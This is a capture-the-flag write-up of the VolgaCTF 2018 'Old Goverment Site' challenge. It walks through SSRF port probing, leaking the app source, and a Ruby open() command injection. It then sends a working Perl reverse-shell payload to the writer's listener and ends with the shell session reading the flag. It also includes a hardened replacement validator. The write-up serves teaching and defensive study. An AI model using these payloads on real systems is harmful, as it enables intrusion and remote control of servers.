VolgaCTF Quals 2018 - Old Goverment Site Writeup
Old Goverment Site
It's an old government web-site. Please, don't touch it. It works properly.
http://old-government-site.quals.2018.volgactf.ru:8080/
http://old-government-site.quals.2018.volgactf.ru:8080/page?id=2
http://old-government-site.quals.2018.volgactf.ru:8080/page?id=18
Form with 2 fields: Site, Company description.
The Site parameter was vulnerable to SSRF:
Valid HTTP req/res =>
<ul class="form-style-1">
validated
Invalid HTTP req/res =>
<ul class="form-style-1">
error
POST /page?id=18 HTTP/1.1
Host: old-government-site.quals.2018.volgactf.ru:8080
[..]
site=http://127.0.0.1:8080&description=bbb
site=http://127.0.0.1:8888&description=bbb
site=http://127.0.0.1:8889&description=bbb
<ul class="form-style-1">
validated
http://old-government-site.quals.2018.volgactf.ru:8888
This port can be identified using nmap, but I didn't do it, as most CTF games do not allow it.
A directory listing was found at http://old-government-site.quals.2018.volgactf.ru:8888/
app.rb
pages/
public/
views/
$ wget -r -R "index.html*" http://old-government-site.quals.2018.volgactf.ru:8888/
$ cat old-government-site.quals.2018.volgactf.ru:8888/views/page18.erb
<%
  unless params[:site].nil?
    result = siteValidator(params[:site])
  end
%>
[...]
$ cat old-government-site.quals.2018.volgactf.ru:8888/app.rb
[...]
def siteValidator(site)
  begin
    # open-uri's open() falls back to Kernel#open for strings that are not URLs,
    # and Kernel#open spawns a shell command when the string starts with "|"  <-- RCE
    r = open(site, :allow_redirections => :all)
    "validated"
  rescue Exception => e
    "error"
  end
end
It is quite obvious that we have a command injection vulnerability with the open() function here, since the user-controlled site value reaches open() unchecked.
e.g.
# ruby -e 'puts open("|id").read()'
uid=0(root) gid=0(root) groups=0(root)
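For contrast, here is a hardened replacement for the challenge's siteValidator. This is an added example, not the challenge's code: it never passes user input to Kernel#open, accepts only http/https URLs, refuses hosts that resolve to loopback or private ranges (the SSRF that exposed port 8888), and fetches without following redirects, which the original's :allow_redirections => :all permitted. The resolver: keyword and the fetch_site helper are my own additions so the validation can be tested offline.

```ruby
require 'uri'
require 'ipaddr'
require 'resolv'
require 'net/http'

ALLOWED_SCHEMES = %w[http https].freeze
# Address ranges an external "site" must never point at (loopback, RFC1918, link-local, ULA).
BLOCKED_RANGES = %w[127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16
                    169.254.0.0/16 0.0.0.0/8 ::1/128 fc00::/7 fe80::/10]
                 .map { |cidr| IPAddr.new(cidr) }.freeze

# Returns [:ok, uri] or [:error, reason]. Never calls open() on the input.
# resolver: is injectable (hypothetical parameter) so tests need no DNS.
def validate_site(site, resolver: ->(host) { Resolv.getaddresses(host) })
  # A real URL starts with a scheme; "|id" or "|perl -e ..." fails here immediately.
  return [:error, 'not a URL'] unless site.is_a?(String) && site =~ /\A[A-Za-z][A-Za-z0-9+.-]*:/
  uri = URI.parse(site)
  return [:error, 'scheme'] unless ALLOWED_SCHEMES.include?(uri.scheme&.downcase)
  host = uri.hostname # strips the brackets of IPv6 literals such as [::1]
  return [:error, 'host'] if host.nil? || host.empty?
  addrs = resolver.call(host)
  return [:error, 'unresolvable'] if addrs.empty?
  addrs.each do |a|
    ip = IPAddr.new(a)
    return [:error, 'internal address'] if BLOCKED_RANGES.any? { |r| r.family == ip.family && r.include?(ip) }
  end
  [:ok, uri]
rescue URI::InvalidURIError, IPAddr::InvalidAddressError => e
  [:error, e.class.name]
end

# Fetch only after validation, with timeouts and without following redirects:
# an allowed host could otherwise redirect the server to 127.0.0.1:8888.
# Note: Net::HTTP resolves the name again, so DNS rebinding is still a residual risk.
def fetch_site(site, resolver: ->(host) { Resolv.getaddresses(host) })
  status, uri = validate_site(site, resolver: resolver)
  return 'error' unless status == :ok
  http = Net::HTTP.new(uri.hostname, uri.port)
  http.use_ssl = (uri.scheme == 'https')
  http.open_timeout = http.read_timeout = 3
  res = http.request_get(uri.request_uri)
  res.is_a?(Net::HTTPSuccess) ? 'validated' : 'error'
rescue StandardError
  'error'
end
```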
POST /page?id=18 HTTP/1.1
Host: old-government-site.quals.2018.volgactf.ru:8080
Content-Length: 274
Cache-Control: max-age=0
Origin: http://old-government-site.quals.2018.volgactf.ru:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://old-government-site.quals.2018.volgactf.ru:8080/page?id=18
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,th;q=0.8
Connection: close
site=|perl+-e+'use+Socket%3b$i%3d"longcatnaja"%3b$p%3d1234%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'&description=bbb
On my server:
$ ncat -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: C7F1 2122 824C 97E5 0A06 6C79 ADB2 FBEE C059 3D4C
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 188.246.233.28.
Ncat: Connection from 188.246.233.28:49782.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
$ ls -lha /
total 88K
drwxr-xr-x 22 root root 4.0K Mar 23 19:08 .
drwxr-xr-x 22 root root 4.0K Mar 23 19:08 ..
drwxr-xr-x 2 root root 4.0K Mar 23 19:05 bin
drwxr-xr-x 3 root root 4.0K Mar 23 19:05 boot
drwxr-xr-x 17 root root 3.6K Mar 24 18:39 dev
drwxr-xr-x 95 root root 4.0K Mar 24 18:39 etc
-rw-r--r-- 1 root root 41 Mar 23 19:37 flag
[...]
$ cat /flag
VolgaCTF{dedicated_to_all_goverment_site}